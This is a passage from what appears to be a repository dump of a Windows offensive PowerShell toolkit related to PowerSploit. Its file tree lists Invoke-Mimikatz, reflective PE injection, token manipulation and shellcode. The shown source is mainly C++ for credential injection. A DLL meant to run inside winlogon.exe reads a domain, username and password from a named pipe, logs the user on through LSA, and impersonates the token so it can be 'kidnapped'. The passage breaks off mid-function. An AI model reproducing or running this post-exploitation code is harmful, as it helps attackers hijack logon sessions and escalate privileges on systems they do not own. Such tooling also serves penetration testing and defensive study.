├── .gitignore
├── Get-ComputerDetails
├── Get-ComputerDetails.ps1
└── README.md
├── Invoke-CredentialInjection
├── Invoke-CredentialInjection.ps1
├── LogonUser
│ └── LogonUser
│ │ ├── LogonUser.sln
│ │ ├── LogonUser
│ │ ├── LogonUser.cpp
│ │ ├── LogonUser.vcxproj
│ │ ├── LogonUser.vcxproj.filters
│ │ ├── ReadMe.txt
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
│ │ └── logon
│ │ ├── ReadMe.txt
│ │ ├── dllmain.cpp
│ │ ├── logon.cpp
│ │ ├── logon.vcxproj
│ │ ├── logon.vcxproj.filters
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
└── README.md
├── Invoke-Mimikatz
├── Invoke-Mimikatz.ps1
└── README.md
├── Invoke-NinjaCopy
├── Invoke-NinjaCopy.ps1
├── NTFSParser
│ ├── NTFSParser.sln
│ ├── NTFSParser
│ │ ├── NTFS.h
│ │ ├── NTFSParser.cpp
│ │ ├── NTFSParser.vcxproj
│ │ ├── NTFSParser.vcxproj.filters
│ │ ├── NTFS_Attribute.h
│ │ ├── NTFS_Common.h
│ │ ├── NTFS_DataType.h
│ │ ├── NTFS_FileRecord.h
│ │ ├── ReadMe.txt
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
│ └── NTFSParserDLL
│ │ ├── NTFS.h
│ │ ├── NTFSParserDLL.cpp
│ │ ├── NTFSParserDLL.vcxproj
│ │ ├── NTFSParserDLL.vcxproj.filters
│ │ ├── NTFS_Attribute.h
│ │ ├── NTFS_Common.h
│ │ ├── NTFS_DataType.h
│ │ ├── NTFS_FileRecord.h
│ │ ├── ReadMe.txt
│ │ ├── dllmain.cpp
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
└── README.md
├── Invoke-ReflectivePEInjection
├── Convert-FileToBase64String.ps1
├── Convert-FileToByteArrayString.ps1
├── DemoDLL
│ ├── DemoDLL.sln
│ └── DemoDLL
│ │ ├── DemoDLL.cpp
│ │ ├── DemoDLL.h
│ │ ├── DemoDLL.vcxproj
│ │ ├── DemoDLL.vcxproj.filters
│ │ ├── ReadMe.txt
│ │ ├── dllmain.cpp
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
├── DemoDLL_RemoteProcess
│ ├── DemoDLL_RemoteProcess.sln
│ └── DemoDLL_RemoteProcess
│ │ ├── DemoDLL_RemoteProcess.cpp
│ │ ├── DemoDLL_RemoteProcess.vcxproj
│ │ ├── DemoDLL_RemoteProcess.vcxproj.filters
│ │ ├── ReadMe.txt
│ │ ├── dllmain.cpp
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
├── DemoExe
│ ├── DemoExe.sln
│ ├── DemoExe_MD
│ │ ├── DemoExe_MD.cpp
│ │ ├── DemoExe_MD.vcxproj
│ │ ├── DemoExe_MD.vcxproj.filters
│ │ ├── ReadMe.txt
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
│ └── DemoExe_MDd
│ │ ├── DemoExe_MDd.cpp
│ │ ├── DemoExe_MDd.vcxproj
│ │ ├── DemoExe_MDd.vcxproj.filters
│ │ ├── ReadMe.txt
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
├── ExeToInjectInTo
│ ├── ExeToInjectInTo.sln
│ └── ExeToInjectInTo
│ │ ├── ExeToInjectInTo.cpp
│ │ ├── ExeToInjectInTo.vcxproj
│ │ ├── ExeToInjectInTo.vcxproj.filters
│ │ ├── ReadMe.txt
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
├── Invoke-ReflectivePEInjection.ps1
├── README.md
└── Shellcode
│ ├── readme.txt
│ ├── x64
│ ├── CallDllMain.asm
│ ├── ExitThread.asm
│ ├── GetFuncAddress.asm
│ └── LoadLibraryA.asm
│ └── x86
│ ├── CallDllMain.asm
│ ├── ExitThread.asm
│ └── GetProcAddress.asm
├── Invoke-TokenManipulation
├── Invoke-TokenManipulation.ps1
└── README.md
└── README.md
/.gitignore:
--------------------------------------------------------------------------------
1 | #################
2 | ## Eclipse
3 | #################
4 |
5 | *.pydevproject
6 | .project
7 | .metadata
8 | bin/
9 | tmp/
10 | *.tmp
11 | *.bak
12 | *.swp
13 | *~.nib
14 | local.properties
15 | .classpath
16 | .settings/
17 | .loadpath
18 |
19 | # External tool builders
20 | .externalToolBuilders/
21 |
22 | # Locally stored "Eclipse launch configurations"
23 | *.launch
24 |
25 | # CDT-specific
26 | .cproject
27 |
28 | # PDT-specific
29 | .buildpath
30 |
31 |
32 | #################
33 | ## Visual Studio
34 | #################
35 |
36 | ## Ignore Visual Studio temporary files, build results, and
37 | ## files generated by popular Visual Studio add-ons.
38 |
39 | # User-specific files
40 | *.suo
41 | *.user
42 | *.sln.docstates
43 |
44 | # Build results
45 | [Dd]ebug/
46 | [Rr]elease/
47 | *_i.c
48 | *_p.c
49 | *.ilk
50 | *.meta
51 | *.obj
52 | *.pch
53 | *.pdb
54 | *.pgc
55 | *.pgd
56 | *.rsp
57 | *.sbr
58 | *.tlb
59 | *.tli
60 | *.tlh
61 | *.tmp
62 | *.vspscc
63 | .builds
64 | *.dotCover
65 |
66 | ## TODO: If you have NuGet Package Restore enabled, uncomment this
67 | #packages/
68 |
69 | # Visual C++ cache files
70 | ipch/
71 | *.aps
72 | *.ncb
73 | *.opensdf
74 | *.sdf
75 |
76 | # Visual Studio profiler
77 | *.psess
78 | *.vsp
79 |
80 | # ReSharper is a .NET coding add-in
81 | _ReSharper*
82 |
83 | # Installshield output folder
84 | [Ee]xpress
85 |
86 | # DocProject is a documentation generator add-in
87 | DocProject/buildhelp/
88 | DocProject/Help/*.HxT
89 | DocProject/Help/*.HxC
90 | DocProject/Help/*.hhc
91 | DocProject/Help/*.hhk
92 | DocProject/Help/*.hhp
93 | DocProject/Help/Html2
94 | DocProject/Help/html
95 |
96 | # Click-Once directory
97 | publish
98 |
99 | # Others
100 | [Bb]in
101 | [Oo]bj
102 | sql
103 | TestResults
104 | *.Cache
105 | ClientBin
106 | stylecop.*
107 | ~$*
108 | *.dbmdl
109 | Generated_Code #added for RIA/Silverlight projects
110 |
111 | # Backup & report files from converting an old project file to a newer
112 | # Visual Studio version. Backup files are not needed, because we have git ;-)
113 | _UpgradeReport_Files/
114 | Backup*/
115 | UpgradeLog*.XML
116 |
117 |
118 |
119 | ############
120 | ## Windows
121 | ############
122 |
123 | # Windows image file caches
124 | Thumbs.db
125 |
126 | # Folder config file
127 | Desktop.ini
128 |
129 |
130 | #############
131 | ## Python
132 | #############
133 |
134 | *.py[co]
135 |
136 | # Packages
137 | *.egg
138 | *.egg-info
139 | dist
140 | build
141 | eggs
142 | parts
143 | bin
144 | var
145 | sdist
146 | develop-eggs
147 | .installed.cfg
148 |
149 | # Installer logs
150 | pip-log.txt
151 |
152 | # Unit test / coverage reports
153 | .coverage
154 | .tox
155 |
156 | #Translations
157 | *.mo
158 |
159 | #Mr Developer
160 | .mr.developer.cfg
161 |
162 | # Mac crap
163 | .DS_Store
164 |
165 |
166 | .exe
167 | .dll
168 |
169 |
170 | .svn/
171 |
--------------------------------------------------------------------------------
/Get-ComputerDetails/README.md:
--------------------------------------------------------------------------------
1 | The tools in this directory are part of PowerSploit and are being maintained there. They are preserved here for legacy, but any bug fixes should be checked in to PowerSploit.
2 |
3 | https://github.com/mattifestation/PowerSploit
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/LogonUser.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "logon", "logon\logon.vcxproj", "{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.Build.0 = Debug|Win32
16 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.ActiveCfg = Debug|x64
17 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.Build.0 = Debug|x64
18 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.ActiveCfg = Release|Win32
19 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.Build.0 = Release|Win32
20 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.ActiveCfg = Release|x64
21 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/LogonUser/LogonUser.cpp:
--------------------------------------------------------------------------------
1 | // LogonUser.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 |
6 | using namespace std;
7 |
8 | size_t wcsByteLen( const wchar_t* str );
9 | void InitUnicodeString( UNICODE_STRING& str, const wchar_t* value, BYTE* buffer, size_t& offset );
10 | PVOID CreateNtlmLogonStructure(wstring domain, wstring username, wstring password, DWORD* size);
11 | size_t WriteUnicodeString(wstring str, UNICODE_STRING* uniStr, PVOID baseAddress, size_t offset);
12 |
13 | int _tmain(int argc, _TCHAR* argv[])
14 | {
15 | //Get a handle to LSA
16 | HANDLE hLSA = NULL;
17 | NTSTATUS status = LsaConnectUntrusted(&hLSA);
18 | if (status != 0)
19 | {
20 | cout << "Error calling LsaConnectUntrusted. Error code: " << status << endl;
21 | return -1;
22 | }
23 | if (hLSA == NULL)
24 | {
25 | cout << "hLSA is NULL, this shouldn't ever happen" << endl;
26 | return -1;
27 | }
28 |
29 | //Build LsaLogonUser parameters
30 | LSA_STRING originName = {};
31 | char originNameStr[] = "qpqp";
32 | originName.Buffer = originNameStr;
33 | originName.Length = (USHORT)strlen(originNameStr);
34 | originName.MaximumLength = originName.Length;
35 |
36 | ULONG authPackage = 0;
37 | PLSA_STRING authPackageName = new LSA_STRING();
38 | char authPackageBuf[] = MSV1_0_PACKAGE_NAME;
39 | authPackageName->Buffer = authPackageBuf;
40 | authPackageName->Length = (USHORT)strlen(authPackageBuf);
41 | authPackageName->MaximumLength = (USHORT)strlen(authPackageBuf);
42 | status = LsaLookupAuthenticationPackage(hLSA, authPackageName, &authPackage);
43 | if (status != 0)
44 | {
45 | int winError = LsaNtStatusToWinError(status);
46 | cout << "Call to LsaLookupAuthenticationPackage failed. Error code: " << winError;
47 | return -1;
48 | }
49 |
50 | DWORD authBufferSize = 0;
51 | PVOID authBuffer = CreateNtlmLogonStructure(L"VMWORKSTATION", L"testuser", L"Password1", &authBufferSize);
52 | cout << "authBufferSize: " << authBufferSize << endl;
53 |
54 | //Get TokenSource
55 | HANDLE hProcess = GetCurrentProcess();//todo
56 | HANDLE procToken = NULL;
57 | BOOL success = OpenProcessToken(hProcess, TOKEN_ALL_ACCESS, &procToken);
58 | if (!success)
59 | {
60 | DWORD errorCode = GetLastError();
61 | cout << "Call to OpenProcessToken failed. Errorcode: " << errorCode << endl;
62 | return -1;
63 | }
64 |
65 | TOKEN_SOURCE tokenSource = {};
66 | DWORD realSize = 0;
67 | success = GetTokenInformation(procToken, TokenSource, &tokenSource, sizeof(tokenSource), &realSize);
68 | if (!success)
69 | {
70 | cout << "Call to GetTokenInformation failed." << endl;
71 | return -1;
72 | }
73 |
74 |
75 | //Misc
76 | PVOID profileBuffer = NULL;
77 | ULONG profileBufferSize = 0;
78 | LUID loginId;
79 | HANDLE token = NULL;
80 | QUOTA_LIMITS quotaLimits;
81 | NTSTATUS subStatus = 0;
82 |
83 | status = LsaLogonUser(hLSA,
84 | &originName,
85 | RemoteInteractive,
86 | authPackage,
87 | authBuffer,
88 | authBufferSize,
89 | 0,
90 | &tokenSource,
91 | &profileBuffer,
92 | &profileBufferSize,
93 | &loginId,
94 | &token,
95 | "aLimits,
96 | &subStatus);
97 |
98 | if (status != 0)
99 | {
100 | NTSTATUS winError = LsaNtStatusToWinError(status);
101 | cout << "Error calling LsaLogonUser. Error code: " << winError << endl;
102 | return -1;
103 | }
104 |
105 | cout << "Success!" << endl;
106 |
107 | return 1;
108 | }
109 |
110 | //size will be set to the size of the structure created
111 | PVOID CreateNtlmLogonStructure(wstring domain, wstring username, wstring password, DWORD* size)
112 | {
113 | size_t wcharSize = sizeof(wchar_t);
114 |
115 | size_t totalSize = sizeof(MSV1_0_INTERACTIVE_LOGON) + ((domain.length() + username.length() + password.length()) * wcharSize);
116 | MSV1_0_INTERACTIVE_LOGON* ntlmLogon = (PMSV1_0_INTERACTIVE_LOGON)(new BYTE[totalSize]);
117 | size_t offset = sizeof(MSV1_0_INTERACTIVE_LOGON);
118 |
119 | ntlmLogon->MessageType = MsV1_0InteractiveLogon;
120 | offset += WriteUnicodeString(domain, &(ntlmLogon->LogonDomainName), ntlmLogon, offset);
121 | offset += WriteUnicodeString(username, &(ntlmLogon->UserName), ntlmLogon, offset);
122 | offset += WriteUnicodeString(password, &(ntlmLogon->Password), ntlmLogon, offset);
123 |
124 | *size = (DWORD)totalSize; //If the size is bigger than a DWORD, there is a gigantic bug somewhere.
125 | return ntlmLogon;
126 | }
127 |
128 | size_t WriteUnicodeString(wstring str, UNICODE_STRING* uniStr, PVOID baseAddress, size_t offset)
129 | {
130 | const wchar_t* buffer = str.c_str();
131 | size_t size = str.length() * sizeof(wchar_t);
132 | uniStr->Length = (USHORT)size;
133 | uniStr->MaximumLength = (USHORT)size;
134 | uniStr->Buffer = (PWSTR)((UINT_PTR)baseAddress + offset);
135 | memcpy((PVOID)((UINT_PTR)baseAddress + offset), str.c_str(), size);
136 | return size;
137 | }
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Debug
10 | x64
11 |
12 |
13 | Release
14 | Win32
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {F9DC2AAF-2213-4D87-9F52-283DA1CC6E18}
23 | Win32Proj
24 | LogonUser
25 |
26 |
27 |
28 | Application
29 | true
30 | v110
31 | Unicode
32 |
33 |
34 | Application
35 | true
36 | v110
37 | Unicode
38 |
39 |
40 | Application
41 | false
42 | v110
43 | true
44 | Unicode
45 |
46 |
47 | Application
48 | false
49 | v110
50 | true
51 | Unicode
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 | true
71 |
72 |
73 | true
74 |
75 |
76 | false
77 |
78 |
79 | false
80 |
81 |
82 |
83 | Use
84 | Level3
85 | Disabled
86 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
87 |
88 |
89 | Console
90 | true
91 | secur32.lib;%(AdditionalDependencies)
92 |
93 |
94 |
95 |
96 | Use
97 | Level3
98 | Disabled
99 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
100 |
101 |
102 | Console
103 | true
104 | secur32.lib;%(AdditionalDependencies)
105 |
106 |
107 |
108 |
109 | Level3
110 | Use
111 | MaxSpeed
112 | true
113 | true
114 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
115 |
116 |
117 | Console
118 | true
119 | true
120 | true
121 |
122 |
123 |
124 |
125 | Level3
126 | Use
127 | MaxSpeed
128 | true
129 | true
130 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
131 |
132 |
133 | Console
134 | true
135 | true
136 | true
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 | Create
150 | Create
151 | Create
152 | Create
153 |
154 |
155 |
156 |
157 |
158 |
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/LogonUser/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : LogonUser Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this LogonUser application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your LogonUser application.
9 |
10 |
11 | LogonUser.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | LogonUser.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | LogonUser.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named LogonUser.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/LogonUser/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // LogonUser.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/LogonUser/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 |
16 |
17 |
18 |
19 |
20 | // TODO: reference additional headers your program requires here
21 |
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/LogonUser/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/logon/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : logon Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this logon DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your logon application.
9 |
10 |
11 | logon.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | logon.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | logon.cpp
25 | This is the main DLL source file.
26 |
27 | When created, this DLL does not export any symbols. As a result, it
28 | will not produce a .lib file when it is built. If you wish this project
29 | to be a project dependency of some other project, you will either need to
30 | add code to export some symbols from the DLL so that an export library
31 | will be produced, or you can set the Ignore Input Library property to Yes
32 | on the General propert page of the Linker folder in the project's Property
33 | Pages dialog box.
34 |
35 | /////////////////////////////////////////////////////////////////////////////
36 | Other standard files:
37 |
38 | StdAfx.h, StdAfx.cpp
39 | These files are used to build a precompiled header (PCH) file
40 | named logon.pch and a precompiled types file named StdAfx.obj.
41 |
42 | /////////////////////////////////////////////////////////////////////////////
43 | Other notes:
44 |
45 | AppWizard uses "TODO:" comments to indicate parts of the source code you
46 | should add to or customize.
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 |
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/logon/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "stdafx.h"
3 |
4 | BOOL APIENTRY DllMain( HMODULE hModule,
5 | DWORD ul_reason_for_call,
6 | LPVOID lpReserved
7 | )
8 | {
9 | switch (ul_reason_for_call)
10 | {
11 | case DLL_PROCESS_ATTACH:
12 | case DLL_THREAD_ATTACH:
13 | case DLL_THREAD_DETACH:
14 | case DLL_PROCESS_DETACH:
15 | break;
16 | }
17 | return TRUE;
18 | }
19 |
20 |
--------------------------------------------------------------------------------
/Invoke-CredentialInjection/LogonUser/LogonUser/logon/logon.cpp:
--------------------------------------------------------------------------------
1 | // logon.cpp : Defines the exported functions for the DLL application.
2 | //
3 |
4 | #include "stdafx.h"
5 |
6 | using namespace std;
7 |
8 | size_t wcsByteLen( const wchar_t* str );
9 | void InitUnicodeString( UNICODE_STRING& str, const wchar_t* value, BYTE* buffer, size_t& offset );
10 | PVOID CreateKerbLogonStructure(const wchar_t* domain, const wchar_t* username, const wchar_t* password, DWORD* size);
11 | PVOID CreateNtlmLogonStructure(const wchar_t* domain, const wchar_t* username, const wchar_t* password, DWORD* size);
12 | size_t WriteUnicodeString(const wchar_t* str, UNICODE_STRING* uniStr, PVOID address);
13 | void WriteErrorToPipe(string errorMsg, HANDLE pipe);
14 |
15 | extern "C" __declspec( dllexport ) void VoidFunc();
16 |
17 |
18 | //The entire point of this code is to call LsaLogonUser from within winlogon.exe
19 | extern "C" __declspec( dllexport ) void VoidFunc()
20 | {
21 | //Open a pipe which will receive data from the PowerShell script.
22 | HANDLE pipe = CreateFile(L"\\\\.\\pipe\\sqsvc", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
23 | if (pipe == INVALID_HANDLE_VALUE)
24 | {
25 | return;
26 | }
27 |
28 | const size_t strSize = 257;
29 | size_t bytesToRead = strSize * sizeof(wchar_t) - sizeof(wchar_t);
30 | wchar_t* domain = new wchar_t[strSize];
31 | wchar_t* username = new wchar_t[strSize];
32 | wchar_t* password = new wchar_t[strSize];
33 | DWORD bytesRead = 0;
34 |
35 | BOOL success = ReadFile(pipe, domain, bytesToRead, &bytesRead, NULL);
36 | if (!success)
37 | {
38 | return;
39 | }
40 | domain[bytesRead/2] = '\0';
41 | bytesRead = 0;
42 |
43 | success = ReadFile(pipe, username, bytesToRead, &bytesRead, NULL);
44 | if (!success)
45 | {
46 | return;
47 | }
48 | username[bytesRead/2] = '\0';
49 | bytesRead = 0;
50 |
51 | success = ReadFile(pipe, password, bytesToRead, &bytesRead, NULL);
52 | if (!success)
53 | {
54 | return;
55 | }
56 | password[bytesRead/2] = '\0';
57 | bytesRead = 0;
58 |
59 | //Get the logon type from the pipe
60 | USHORT logonType = 10;
61 | success = ReadFile(pipe, &logonType, 1, &bytesRead, NULL);
62 | if (!success)
63 | {
64 | return;
65 | }
66 | bytesRead = 0;
67 |
68 | //Get the authentication package to use. 1 = Msv1_0, 2 = Kerberos
69 | USHORT authPackageToUse = 0;
70 | success = ReadFile(pipe, &authPackageToUse, 1, &bytesRead, NULL);
71 | if (!success)
72 | {
73 | return;
74 | }
75 | bytesRead = 0;
76 |
77 | /////////////
78 | //Build the parameters to call LsaLogonUser with
79 | /////////////
80 |
81 | //Get a handle to LSA
82 | HANDLE hLSA = NULL;
83 | NTSTATUS status = LsaConnectUntrusted(&hLSA);
84 | if (status != 0)
85 | {
86 | string errorMsg = "Error calling LsaConnectUntrusted. Error code: " + to_string(status);
87 | WriteErrorToPipe(errorMsg, pipe);
88 | return;
89 | }
90 | if (hLSA == NULL)
91 | {
92 | string errorMsg = "hLSA (LSA handle) is NULL, this shouldn't ever happen.";
93 | WriteErrorToPipe(errorMsg, pipe);
94 | return;
95 | }
96 |
97 | //Build LsaLogonUser parameters
98 | LSA_STRING originName = {};
99 | char originNameStr[] = "";
100 | originName.Buffer = originNameStr;
101 | originName.Length = (USHORT)0;
102 | originName.MaximumLength = 0;
103 |
104 | //Build the authentication package parameter based on the auth package the powershell script specified to use
105 | //Also get the AuthenticationInformation
106 | char* authPackageBuf = NULL;
107 | DWORD authBufferSize = 0;
108 | PVOID authBuffer = NULL;
109 | if (authPackageToUse == 1)
110 | {
111 | authPackageBuf = MSV1_0_PACKAGE_NAME;
112 | authBuffer = CreateNtlmLogonStructure(domain, username, password, &authBufferSize);
113 | }
114 | else if (authPackageToUse == 2)
115 | {
116 | authPackageBuf = MICROSOFT_KERBEROS_NAME_A;
117 | authBuffer = CreateKerbLogonStructure(domain, username, password, &authBufferSize);
118 | }
119 | else
120 | {
121 | string errorMsg = "Received an invalid auth package from the named pipe";
122 | WriteErrorToPipe(errorMsg, pipe);
123 | return;
124 | }
125 |
126 | ULONG authPackage = 0;
127 | PLSA_STRING authPackageName = new LSA_STRING();
128 | authPackageName->Buffer = authPackageBuf;
129 | authPackageName->Length = (USHORT)strlen(authPackageBuf);
130 | authPackageName->MaximumLength = (USHORT)strlen(authPackageBuf);
131 | status = LsaLookupAuthenticationPackage(hLSA, authPackageName, &authPackage);
132 | if (status != 0)
133 | {
134 | int winError = LsaNtStatusToWinError(status);
135 | string errorMsg = "Call to LsaLookupAuthenticationPackage failed. Error code: " + to_string(winError);
136 | WriteErrorToPipe(errorMsg, pipe);
137 | return;
138 | }
139 |
140 | //Get TokenSource
141 | HANDLE hProcess = GetCurrentProcess();//todo
142 | HANDLE procToken = NULL;
143 | success = OpenProcessToken(hProcess, TOKEN_ALL_ACCESS, &procToken);
144 | if (!success)
145 | {
146 | DWORD errorCode = GetLastError();
147 | string errorMsg = "Call to OpenProcessToken failed. Errorcode: " + to_string(errorCode);
148 | WriteErrorToPipe(errorMsg, pipe);
149 | return;
150 | }
151 |
152 | TOKEN_SOURCE tokenSource = {};
153 | DWORD realSize = 0;
154 | success = GetTokenInformation(procToken, TokenSource, &tokenSource, sizeof(tokenSource), &realSize);
155 | if (!success)
156 | {
157 | string errorMsg = "Call to GetTokenInformation failed.";
158 | WriteErrorToPipe(errorMsg, pipe);
159 | return;
160 | }
161 |
162 | //Misc out parameters
163 | PVOID profileBuffer = NULL;
164 | ULONG profileBufferSize = 0;
165 | LUID loginId;
166 | HANDLE token = NULL;
167 | QUOTA_LIMITS quotaLimits;
168 | NTSTATUS subStatus = 0;
169 |
170 | //Log on the user
171 | status = LsaLogonUser(hLSA,
172 | &originName,
173 | static_cast(logonType),
174 | authPackage,
175 | authBuffer,
176 | authBufferSize,
177 | 0,
178 | &tokenSource,
179 | &profileBuffer,
180 | &profileBufferSize,
181 | &loginId,
182 | &token,
183 | "aLimits,
184 | &subStatus);
185 |
186 | if (status != 0)
187 | {
188 | NTSTATUS winError = LsaNtStatusToWinError(status);
189 | string errorMsg = "Error calling LsaLogonUser. Error code: " + to_string(winError);
190 | WriteErrorToPipe(errorMsg, pipe);
191 | return;
192 | }
193 |
194 |
195 | //Impersonate the token with the current thread so it can be kidnapped
196 | ImpersonateLoggedOnUser(token);
197 |
198 | //Put the thread to sleep so it can be impersonated
199 | string successMsg = "Logon succeeded, impersonating the token so it can be kidnapped and starting an infinite loop with the thread.";
200 | WriteErrorToPipe(successMsg, pipe);
201 | HANDLE permenantSleep = CreateMutex(NULL, false, NULL);
202 | while(1)
203 | {
204 | Sleep(MAXDWORD);
205 | }
206 |
207 | return;
208 | }
209 |
210 |
211 | PVOID CreateKerbLogonStructure(const wchar_t* domain, const wchar_t* username, const wchar_t* password, DWORD* size)
212 | {
213 | size_t wcharSize = sizeof(wchar_t);
214 |
215 | size_t totalSize = sizeof(KERB_INTERACTIVE_LOGON) + ((lstrlenW(domain) + lstrlenW(username) + lstrlenW(password)) * wcharSize);
216 | KERB_INTERACTIVE_LOGON* ntlmLogon = (PKERB_INTERACTIVE_LOGON)(new BYTE[totalSize]);
